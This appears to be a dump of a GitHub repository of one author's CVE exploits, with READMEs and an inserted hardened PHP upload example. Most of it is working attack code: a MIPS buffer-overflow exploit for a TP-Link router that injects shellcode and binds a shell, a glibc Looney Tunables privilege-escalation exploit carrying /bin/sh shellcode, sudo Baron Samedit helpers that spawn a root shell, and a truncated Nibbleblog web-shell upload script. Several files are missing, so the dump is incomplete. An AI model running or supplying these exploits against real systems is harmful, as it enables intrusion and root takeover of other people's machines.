```text
├── CVE-2015-6967
│   ├── README.md
│   ├── imgs
│   │   ├── admin_code.png
│   │   ├── exploit_py.png
│   │   ├── plugin.png
│   │   └── vuln_code.png
│   └── nibbleblog_4.0.3_rce.py
├── CVE-2020-28038
│   ├── README.md
│   └── imgs
│       ├── add hook_suffix var to id var.png
│       ├── bad regex.png
│       ├── hook_suffix include pagenow.png
│       ├── payload in js code.png
│       ├── payload in the url.png
│       ├── print the id variable in js.png
│       └── simulate.png
├── CVE-2021-3156
│   ├── README.md
│   ├── exploit.c
│   ├── libnss_xx
│   │   ├── flex.c
│   │   └── flex.so.2
│   ├── poc
│   │   ├── poc.mov
│   │   └── poc.mp4
│   ├── root.c
│   └── run.sh
├── CVE-2022-24355
│   ├── README.md
│   └── cve-2022-24355_exploit.py
├── CVE-2023-4911
│   ├── README.md
│   ├── exploit.c
│   └── poc_video.mp4
└── README.md
```

/CVE-2015-6967/README.md:
--------------------------------------------------------------------------------
# CVE-2015-6967 Nibbleblog 4.0.3

# Some Technical Details

After logging in to the Nibbleblog dashboard, the plugins section exposes the vulnerable `My image` plugin, which lets you upload an image, as shown in the next screenshot.

![upload func](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/plugin.png)

When we upload an image, the application creates the image file at `/nibbleblog/content/private/plugins/my_image/image.jpg`. Looking at the `admin.php` code, we see that several files are included:

![admin_code](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/admin_code.png)

The important one is:
```php
require(PATH_ADMIN_CONTROLLER.$layout['controller']);
# PATH_ADMIN_CONTROLLER = /admin/controllers/
# $layout['controller'] = plugins/config.bit
```
Looking at the code in `admin/controllers/plugins/config.bit`, the following screenshot shows the important variables. The issue is with the first one, `$extension`: it holds the extension of the uploaded file and is appended to the fixed file name `image` without any check on the extension.

![vuln_code](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/vuln_code.png)

So if we upload a file named `test.php`, it is stored without any filtering, under the name `image.php`.

To fix this, we can whitelist the allowed extensions (`jpg`, `jpeg`, `png`, `gif`) with something like this:
```php
$allowed = array('jpg', 'jpeg', 'png', 'gif');
$upload = 0;
$extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
if (in_array($extension, $allowed)) {
    $upload = 1;
}
// ...
if ($upload == 1) {
    // Upload code
} else {
    // Error message about the extension
}
```

# Exploit

![exp](https://github.com/flex0geek/cves-exploits/blob/main/CVE-2015-6967/imgs/exploit_py.png)
--------------------------------------------------------------------------------
/CVE-2015-6967/imgs/admin_code.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/admin_code.png
--------------------------------------------------------------------------------
/CVE-2015-6967/imgs/exploit_py.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/exploit_py.png
--------------------------------------------------------------------------------
/CVE-2015-6967/imgs/plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/plugin.png
--------------------------------------------------------------------------------
/CVE-2015-6967/imgs/vuln_code.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2015-6967/imgs/vuln_code.png
--------------------------------------------------------------------------------
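The extension whitelist proposed in the CVE-2015-6967 README above is the essential fix, because the web server picks the handler for a stored file by its extension. As an added example (not Nibbleblog's code and not this repository's), the PHP below carries that check further in the same style: it applies the whitelist, then verifies with `finfo` and `getimagesize()` that the bytes really are an image of the declared type, and stores the file only under the fixed name `image.<ext>` in a directory chosen by the caller, so the client never controls the path. The function names, the `$_FILES['image']` key and the destination directory are assumptions made for this example.

```php
<?php
// Added example, not Nibbleblog's code: a hardened replacement for the
// unchecked `image.$extension` write in config.bit. The function names and the
// $_FILES['image'] key below are assumptions made for this example.

const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Returns the lower-cased, whitelisted extension the upload may be stored under,
 * or throws when the client-supplied name or the file bytes are not acceptable.
 */
function checkImageUpload(string $tmpPath, string $clientName): string
{
    // 1. Extension whitelist, the fix proposed in the README. pathinfo() returns the
    //    last extension only, so "x.php.jpg" yields "jpg" and must pass step 2 as well.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        throw new RuntimeException("extension '$ext' is not allowed");
    }

    // 2. Content check: the bytes must be an image of the type the extension claims,
    //    so PHP source renamed to .jpg is rejected even though its extension passed.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext] || @getimagesize($tmpPath) === false) {
        throw new RuntimeException("content '$mime' does not match .$ext");
    }

    return $ext;
}

/**
 * Stores one $_FILES entry as image.<ext> inside $destDir. The client controls
 * neither the directory nor the base name, only which whitelisted extension is used.
 */
function storeImageUpload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $ext    = checkImageUpload($file['tmp_name'], $file['name']);
    $target = rtrim($destDir, '/') . '/image.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store upload');
    }
    return $target;
}

// In the plugin's upload handler (form field name and directory assumed):
// $stored = storeImageUpload($_FILES['image'], __DIR__ . '/content/private/plugins/my_image');

// Self-check with constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    $cases = [
        // 1x1 transparent GIF (well-known constant) with an upper-case extension
        ['logo.GIF', base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')],
        // PHP source with its real extension: stopped by the whitelist
        ['test.php', "<?php echo 'not an image'; ?>"],
        // the same bytes renamed to .jpg: stopped by the content check
        ['test.jpg', "<?php echo 'not an image'; ?>"],
    ];
    foreach ($cases as [$name, $bytes]) {
        $tmp = tempnam(sys_get_temp_dir(), 'upl');
        file_put_contents($tmp, $bytes);
        try {
            $verdict = 'accepted, would be stored as image.' . checkImageUpload($tmp, $name);
        } catch (RuntimeException $e) {
            $verdict = 'rejected: ' . $e->getMessage();
        }
        unlink($tmp);
        printf("%-9s -> %s\n", $name, $verdict);
    }
}
```

The content check is defence in depth rather than a replacement for the whitelist: a file that passes both is still only ever written as `image.jpg`, `image.png` or `image.gif`, and the upload directory should additionally be served with script execution disabled.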
/CVE-2015-6967/nibbleblog_4.0.3_rce.py:
--------------------------------------------------------------------------------
(Only the first lines of this file survive on this page. The remainder, the CVE-2020-28038 and CVE-2021-3156 READMEs, and CVE-2021-3156/exploit.c listed in the tree are absent.)
```python
#!/bin/python

import requests, sys

fileName = "sh.php"
body = "
```
--------------------------------------------------------------------------------
/CVE-2021-3156/libnss_xx/flex.c (path inferred from the tree and run.sh; the file's first line is missing):
--------------------------------------------------------------------------------
```c
void __attribute__ ((constructor)) setup(void) {
    puts("[+] CVE-2021-3156 PoC by @flex0geek aka FlEx");
    puts("[+] CVE-2021-3156 Exploited");

    setuid(0);
    setgid(0);
    system("/bin/sh");
}
```
--------------------------------------------------------------------------------
/CVE-2021-3156/libnss_xx/flex.so.2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2021-3156/libnss_xx/flex.so.2
--------------------------------------------------------------------------------
/CVE-2021-3156/poc/poc.mov:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2021-3156/poc/poc.mov
--------------------------------------------------------------------------------
/CVE-2021-3156/poc/poc.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2021-3156/poc/poc.mp4
--------------------------------------------------------------------------------
/CVE-2021-3156/root.c:
--------------------------------------------------------------------------------
```c
int main(int argc, char *argv[], char *envp[])
{
    char* _argv[] = {
        "/usr/bin/sudoedit",
        "-s", argv[0],
        0
    };

    execve("/usr/bin/sudoedit", _argv, &argv[1]);
}
```
--------------------------------------------------------------------------------
/CVE-2021-3156/run.sh:
--------------------------------------------------------------------------------
```sh
#!/bin/sh
gcc -o exploit exploit.c 2>/dev/null
gcc -o root root.c 2>/dev/null
gcc -shared libnss_xx/flex.c -o libnss_xx/flex.so.2 2>/dev/null

./exploit
```
--------------------------------------------------------------------------------
/CVE-2022-24355/README.md:
--------------------------------------------------------------------------------
#### Blog: [[Debug/Exploit CVE-2022-24355] TP-Link TL-WR940N Stack-based Buffer Overflow](https://flex0geek.blogspot.com/2024/04/debugexploit-cve-2022-24355-tp-link-tl.html)
--------------------------------------------------------------------------------
/CVE-2022-24355/cve-2022-24355_exploit.py:
--------------------------------------------------------------------------------
```python
from pwn import *
from time import sleep

context(arch='mips', endian='big', os='linux')

# context.binary = ELF("./v4_vuln/httpd") # modify the path to the httpd file if this line is used.

url = "192.168.0.1"
io = remote(url, 80)

nop = asm("addiu $a0, $a0, 0x4141")  # '$\x84AA'
ra_addr = 0x7cfffa90
avoid = b'\x00\x0a\x0d' + string.ascii_lowercase.encode()

read_shell = asm(shellcraft.findpeer(io.lport))
read_shell += asm(shellcraft.read('$s0', ra_addr, 0x200))
read_shell += asm(f"""
lui $t9, {ra_addr >> 16}
ori $t9, $t9, {ra_addr & 0xffff}
jalr $t9
addiu $a0, $a0, 0x4141
""")

payload = b"F" * 16
payload += p32(ra_addr)
payload += nop * 100
payload += read_shell

assert all(c not in avoid for c in read_shell)

# Construct HTTP GET request with headers
request = b"GET /loginFs/passwd HTTP/1.1\r\n"
request += b"Host: 192.168.0.1\r\n"
request += b"Referer: http://192.168.0.1/\r\n"
request += b"Cookie: " + payload + b"\r\n"
request += b"Upgrade-Insecure-Requests: 1\r\n"
request += b"\r\n"

io.send(request)
pause()

# stage 2
shell = asm(shellcraft.bindsh(4444))
io.send(shell)
io.interactive()

log.progress("connecting to shell")
sh1 = remote("192.168.0.1", 4444)
sh1.interactive()
```
--------------------------------------------------------------------------------
/CVE-2023-4911/README.md:
--------------------------------------------------------------------------------
# Exploit & Debug Looney Tunables CVE-2023-4911 Local Privilege Escalation in the glibc's ld.so.

You can read [my blog](https://flex0geek.blogspot.com/2023/11/exploit-debug-looney-tunables-cve-2023.html).

## POC

https://github.com/flex0geek/cves-exploits/assets/24381260/dc6454a3-a51f-40e2-975a-f2e526d1e2ab
--------------------------------------------------------------------------------
/CVE-2023-4911/exploit.c:
--------------------------------------------------------------------------------
(The header names of the seven `#include` lines were lost in extraction.)
```c
#include
#include
#include
#include
#include
#include
#include

#define env_name "GLIBC_TUNABLES="
#define ignore_tunable env_name "glibc.malloc.mxfast=glibc.malloc.mxfast="
#define dt_rpath "\x20\x10\x10\xfe\xff\x7f"
// #define dt_rpath "\xe0\xee\xff\xff\xff\x7f" // -> use it in NOASLR mode

char* argv[] = {"/usr/bin/su", "--help", NULL};

void replaceBytes(FILE *file, long offset, const char *replacement, size_t replacementSize) {
    fseek(file, offset, SEEK_SET);
    fwrite(replacement, sizeof(char), replacementSize, file);
}

void createLibc(){
    mkdir("\"", 0755);

    FILE *inputFile, *outputFile;
    char filename[] = "/usr/lib/x86_64-linux-gnu/libc.so.6"; // replace with your input file name
    char outputFilename[] = "\"/libc.so.6"; // replace with your output file name

    // Open the input file
    inputFile = fopen(filename, "rb");
    if (inputFile == NULL) {
        perror("Error opening input file");
        return EXIT_FAILURE;
    }

    // Create or open the output file
    outputFile = fopen(outputFilename, "wb");
    if (outputFile == NULL) {
        perror("Error opening or creating output file");
        fclose(inputFile);
        return EXIT_FAILURE;
    }

    // Replace bytes at offset 1 with the provided sequence
    long offsetToReplace = 171456; // start offset of __libc_main
    const char replacement[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";
    size_t replacementSize = sizeof(replacement) - 1; // -1 to exclude the null terminator

    // Copy the file content to the output file
    int ch;
    while ((ch = fgetc(inputFile)) != EOF) {
        fputc(ch, outputFile);
    }

    // Replace bytes at the specified offset
    replaceBytes(outputFile, offsetToReplace, replacement, replacementSize);

    // Close the files
    fclose(inputFile);
    fclose(outputFile);

    printf("Vulnerable libc created '%s'.\n", outputFilename);

    return EXIT_SUCCESS;
}

int64_t time_us(){
    struct timespec tms;

    /* POSIX.1-2008 way */
    if (clock_gettime(CLOCK_REALTIME, &tms))
    {
        return -1;
    }
    /* seconds, multiplied with 1 million */
    int64_t micros = tms.tv_sec * 1000000;
    /* Add full microseconds */
    micros += tms.tv_nsec / 1000;
    /* round up if necessary */
    if (tms.tv_nsec % 1000 >= 500)
    {
        ++micros;
    }
    return micros;
}

int main(){

    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    setbuf(stderr, NULL);

    puts("FlEx exploit @ flex0geek.com");
    printf("brute force 0x");
    for (int i = sizeof(dt_rpath) - 1; i >= 0; i--) {
        printf("%02x", (unsigned char)dt_rpath[i]);
    }
    printf(" as stack address\n");

    puts("Preparing environment");
    char** envp = calloc(0x10000, sizeof(char*));
    char** p_envp = envp;

    // setup directory with patched libc
    createLibc();

    // sending first tunables without overflow
    int firstTunableSize = 0x1000;
    char* firstTunableBuf = malloc(firstTunableSize+1);
    strcpy(firstTunableBuf, env_name);

    for(int i=sizeof(env_name)-1; i < firstTunableSize; i++){
        firstTunableBuf[i] = 'A';
    }

    *p_envp = firstTunableBuf;
    p_envp += 1;

    // sending second tunable with overflow that we need
    int attackTunableSize = 0x3f0;
    char* attackTunableBuf = malloc(attackTunableSize+1+sizeof(ignore_tunable));

    strcpy(attackTunableBuf, ignore_tunable);
    for(int i=sizeof(ignore_tunable)-1; i < (attackTunableSize+sizeof(ignore_tunable)-1); i++){
        attackTunableBuf[i] = "V";
    }

    *p_envp = attackTunableBuf;
    p_envp += 1;

    // prepare the link_map struct to add the stack address (brute force) at the right offset in l_info[DT_RPATH], which is index 15; we use nulls before and after so nothing else is corrupted
    int firstNilSize = 0xdb;
    for( int i=0; i < firstNilSize; i++ ){
        *p_envp = "";
        p_envp += 1;
    }

    *p_envp = dt_rpath;
    p_envp += 1;

    int secondNilSize = 0x500;
    for( int i=0; i < secondNilSize; i++ ){
        *p_envp = "";
        p_envp += 1;
    }

    // send a normal tunables to not avoid overwrite the struct from the previous attack
    int secondTunableSize = 0x40f;
    char* secondTunableBuf = malloc(secondTunableSize+1);
    strcpy(secondTunableBuf, env_name);

    for(int i=sizeof(env_name)-1; i < secondTunableSize; i++){
        secondTunableBuf[i] = "A";
    }

    *p_envp = secondTunableBuf;
    p_envp += 1;

    // fill the stack with -20 (0xffffffffffffffec), which is the string in dynstr of the su binary that points to ", used as the trusted directory; we have to take care of alignment here
    int fillStackSize = 0x3fff;
    char* stackBuf= malloc( (fillStackSize+1)* sizeof(char*) );

    for( int i=0; i < fillStackSize; i++ ){
        ((int64_t *)stackBuf)[i]= -20;
    }
    ((int64_t *)stackBuf)[fillStackSize] = 0x0041414141414141;

    for( int i=0; i < 0xf; i++ ){
        *p_envp = stackBuf;
        p_envp += 1;
    }

    // correct the alignment
    for( int i=0; i < 0x4; i++){
        *p_envp = "";
        p_envp += 1;
    }

    // brute force
    int pid;
    int count = 1;
    puts("Attack Started ");
    while( 1 ){
        count++;
        printf(".");

        if( count % 100 == 0){
            printf("\nWe tried %d times\n", count);
        }

        if((pid=fork()) == 0){
            // child
            execve(argv[0], argv, envp);
            // break;

        }else{
            //parent
            int wstatus;
            int st, en;
            st = time_us();
            wait(&wstatus);
            en = time_us();
            if( !WIFSIGNALED(wstatus) && en-st > 1000000 ){
                break;
            }
        }
    }

    return 0;
}
```
--------------------------------------------------------------------------------
/CVE-2023-4911/poc_video.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/flex0geek/cves-exploits/cd9c8a32037480448e3a97830c709292a61a48aa/CVE-2023-4911/poc_video.mp4
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVEs Exploits

I'm adding exploits for some CVEs that I wrote.

## 2024
#### [CVE-2022-24355 TP-Link TL-WR940N Stack-based Buffer Overflow](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2022-24355)

---

## 2023
#### [CVE-2023-4911 Buffer Overflow in glibc's ld.so](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2023-4911)
#### [CVE-2021-3156 Heap-Based Buffer Overflow in Sudo](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2021-3156)

---

## 2021
#### [CVE-2015-6967 Nibbleblog 4.0.3](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2015-6967)
#### [CVE-2020-28038 WordPress before 5.5.2](https://github.com/flex0geek/cves-exploits/tree/main/CVE-2020-28038)
--------------------------------------------------------------------------------